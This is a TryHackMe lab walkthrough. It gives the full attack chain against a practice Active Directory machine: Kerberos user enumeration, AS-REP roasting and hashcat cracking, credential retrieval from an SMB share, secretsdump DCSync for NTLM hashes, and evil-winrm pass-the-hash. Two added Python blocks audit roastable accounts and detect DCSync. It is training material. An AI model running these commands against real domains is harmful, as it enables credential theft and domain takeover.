TryHackMe - Attacktive Directory - Walkthrough
Introduction
Today we're going to be doing a walkthrough for the Attacktive Directory room hosted at https://tryhackme.com/room/attacktivedirectory. For this walkthrough, we'll be using two virtual machines (VMs): a Kali Linux VM as our attacking machine, and the deployed Windows client as the victim machine. After the Windows client IP is assigned, we alias the machine as attacktive.thm.
Task 1 - Intro - Deploy The Machine
Questions
To access the Virtual Machine, you will need to first connect to our network using OpenVPN. Here is a mini walkthrough of getting connected.
No answer needed
Return to your access page. You can verify you are connected by looking on your access page. Refresh the page. You should see a green tick next to Connected. It will also show you your internal IP address.
No answer needed
Alternatively, you can deploy the In-Browser Kali or Attack Box and automatically be connected to the TryHackMe Network.
No answer needed
Once connected to the VPN, deploy the machine and get hacking!
No answer needed
Task 2 - Intro - Setup
Questions
Install Impacket, Bloodhound and Neo4j
No answer needed
Task 3 - Enumeration - Welcome to Attacktive Directory
Questions
What tool will allow us to enumerate port 139/445?
The tool we're looking for is an enumeration tool for Linux only.
What is the NetBIOS-Domain Name of the machine?
nmap -T4 --top-ports=1000 -sC -sV attacktive.thm
What invalid TLD do people commonly use for their Active Directory Domain?
Answer is contained within the Hint for the question.
Task 4 - Enumeration - Enumerating Users via Kerberos
Questions
What command within Kerbrute will allow us to enumerate valid usernames?
./kerbrute64 -h
What notable account is discovered? (These should jump out at you)
What is the other notable account that is discovered? (These should jump out at you)
./kerbrute64 userenum userlist.txt -d spookysec.local --dc attacktive.thm
Task 5 - Exploitation - Abusing Kerberos
Questions
We have two user accounts that we could potentially query a ticket from. Which user account can you query a ticket from with no password?
Create a list of users found through kerbrute userenum, then issue the following command:
python3 /opt/impacket/examples/GetNPUsers.py thm-ad/ -usersfile ./user.txt -dc-ip attacktive.thm -request -format hashcat -debug -outputfile asrep.hash | tee getnpusers.log
cat asrep.hash
Looking at the Hashcat Examples Wiki page, what type of Kerberos hash did we retrieve from the KDC? (Specify the full name)
What mode is the hash?
Navigate to the following URL:
https://hashcat.net/wiki/doku.php?id=example_hashes
Search for “AS-REP” on the page.
Now crack the hash with the modified password list provided. What is the user account's password?
hashcat --force -m 18200 -a 0 asrep.hash ./passwordlist.txt
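As an added illustration (not part of the original walkthrough), the Python below parses a hashcat mode 18200 line of the kind GetNPUsers writes to asrep.hash and shows the userAccountControl bit (DONT_REQ_PREAUTH) that makes an account roastable in the first place, which is what a defender audits for. The sample hash line, account names and UAC values are constructed.

```python
import re
from dataclasses import dataclass

# userAccountControl bit that disables Kerberos pre-authentication; an account with this
# set answers a bare AS-REQ with an AS-REP encrypted under the account's key, which is
# what GetNPUsers collects and hashcat mode 18200 attacks.
DONT_REQ_PREAUTH = 0x400000

# Equivalent LDAP filter an admin can use to audit for such accounts (bitwise-AND rule):
# (&(objectCategory=person)(userAccountControl:1.2.840.113556.1.4.803:=4194304))

# Constructed sample line in hashcat 18200 format; the hex material is made up.
SAMPLE_HASH = ("$krb5asrep$23$svc-example@SPOOKYSEC.LOCAL:"
               + "ab" * 16 + "$" + "cd" * 40)

_ASREP_RE = re.compile(
    r"^\$krb5asrep\$(\d+)\$([^@$]+)@([^:]+):([0-9a-fA-F]{32})\$([0-9a-fA-F]+)$")

@dataclass
class AsRepHash:
    etype: int
    user: str
    realm: str
    checksum: str   # 16-byte HMAC-MD5 over the encrypted part, hex
    cipher: str     # RC4-encrypted enc-part, hex

def parse_asrep_hash(line: str) -> AsRepHash:
    """Split a $krb5asrep$ line into its fields; raises ValueError on anything else."""
    m = _ASREP_RE.match(line.strip())
    if not m:
        raise ValueError("not a hashcat $krb5asrep$ line")
    return AsRepHash(int(m.group(1)), m.group(2), m.group(3),
                     m.group(4).lower(), m.group(5).lower())

def hashcat_mode(h: AsRepHash):
    """18200 is 'Kerberos 5, etype 23, AS-REP'; other etypes need a different mode."""
    return 18200 if h.etype == 23 else None

def is_asrep_roastable(user_account_control: int) -> bool:
    return bool(user_account_control & DONT_REQ_PREAUTH)

def roastable_accounts(accounts):
    """accounts: iterable of (sAMAccountName, userAccountControl) pairs."""
    return sorted(name for name, uac in accounts if is_asrep_roastable(uac))

if __name__ == "__main__":
    h = parse_asrep_hash(SAMPLE_HASH)
    print(h.user, h.realm, "etype", h.etype, "-> hashcat -m", hashcat_mode(h))
    # Constructed directory snapshot: 0x10200 = NORMAL_ACCOUNT | DONT_EXPIRE_PASSWORD
    print(roastable_accounts([("svc-example", 0x10200 | DONT_REQ_PREAUTH),
                              ("backup", 0x10200), ("Administrator", 0x10200)]))
```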
Task 6 - Enumeration - Back to the Basics
Questions
What utility can we use to map remote SMB shares?
Answer contained within the question hint.
Which option will list shares?
Answer contained within the question hint.
How many remote shares is the server listing?
There is one particular share that we have access to that contains a text file. Which share is it?
smbclient -L //attacktive.thm/ -U 'capturedUsername'
Enter the cracked password when prompted.
What is the content of the file?
smbclient //attacktive.thm/found-directory -U 'capturedUsername'
Enter the cracked password when prompted.
dir
get backup_credentials.txt
exit
cat backup_credentials.txt
Decoding the contents of the file, what is the full contents?
cat backup_credentials.txt | base64 -d
Task 7 - Domain Privilege Escalation - Elevating Privileges within the Domain
Questions
What method allowed us to dump NTDS.DIT?
python3 /opt/impacket/examples/secretsdump.py
What is the Administrator's NTLM hash?
python3 /opt/impacket/examples/secretsdump.py -just-dc-ntlm 'spookysec.local/backup:capturedPassword@attacktive.thm'
What method of attack could allow us to authenticate as the user without the password?
Not the password, but rather the hash.
Using a tool called Evil-WinRM, what option will allow us to use a hash?
evil-winrm
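Added example, not part of the original walkthrough: the secretsdump method above pulls the NTDS.DIT secrets through directory replication, which a domain controller records as Event ID 4662 carrying the DS-Replication-Get-Changes rights in the Properties field when directory service access auditing is enabled. The Python below runs a simple DCSync check over constructed sample events; the account names, the DC allow-list and the non-replication GUID in the third event are assumptions for the demonstration.

```python
# Access-right GUIDs that show up in the Properties field of a 4662 event when a
# principal reads directory changes via replication (DRSUAPI GetNCChanges).
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}

# Constructed sample events using the 4662 field names; everything except the
# replication GUIDs above is made up. Assumed domain: SPOOKYSEC.
SAMPLE_EVENTS = [
    {"EventID": 4662, "SubjectUserName": "DC01$", "SubjectDomainName": "SPOOKYSEC",
     "ObjectName": "DC=spookysec,DC=local",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "SubjectUserName": "backup", "SubjectDomainName": "SPOOKYSEC",
     "ObjectName": "DC=spookysec,DC=local",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "SubjectUserName": "svc-admin", "SubjectDomainName": "SPOOKYSEC",
     "ObjectName": "CN=svc-admin,CN=Users,DC=spookysec,DC=local",
     "Properties": "{bf967aba-0de6-11d0-a285-00aa003049e2}"},   # ordinary object read
    {"EventID": 4624, "SubjectUserName": "backup", "SubjectDomainName": "SPOOKYSEC"},
]

def replication_rights(properties: str):
    """Return the human-readable replication rights named in a 4662 Properties string."""
    found = []
    for guid, name in REPLICATION_RIGHTS.items():
        if guid in properties.lower():
            found.append(name)
    return found

def find_dcsync(events, dc_accounts):
    """Flag 4662 events where a non-DC principal exercised replication rights.

    dc_accounts: set of DC machine accounts (e.g. {"DC01$"}) that replicate legitimately;
    a real deployment would also allow-list known sync accounts such as Azure AD Connect's.
    """
    alerts = []
    for ev in events:
        if ev.get("EventID") != 4662:
            continue
        rights = replication_rights(ev.get("Properties", ""))
        if not rights or ev["SubjectUserName"] in dc_accounts:
            continue
        alerts.append({"user": f'{ev["SubjectDomainName"]}\\{ev["SubjectUserName"]}',
                       "object": ev.get("ObjectName", ""), "rights": rights})
    return alerts

if __name__ == "__main__":
    for a in find_dcsync(SAMPLE_EVENTS, {"DC01$"}):
        print("possible DCSync:", a["user"], "on", a["object"], "with", ", ".join(a["rights"]))
```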
Task 8 - Flag Submission - Flag Submission Panel
Questions
svc-admin
evil-winrm -i attacktive.thm -u Administrator -H 'capturedHash'
type c:\users\svc-admin\desktop\user.txt.txt
backup
type c:\users\backup\desktop\privesc.txt
Administrator
type c:\users\administrator\desktop\root.txt
Finish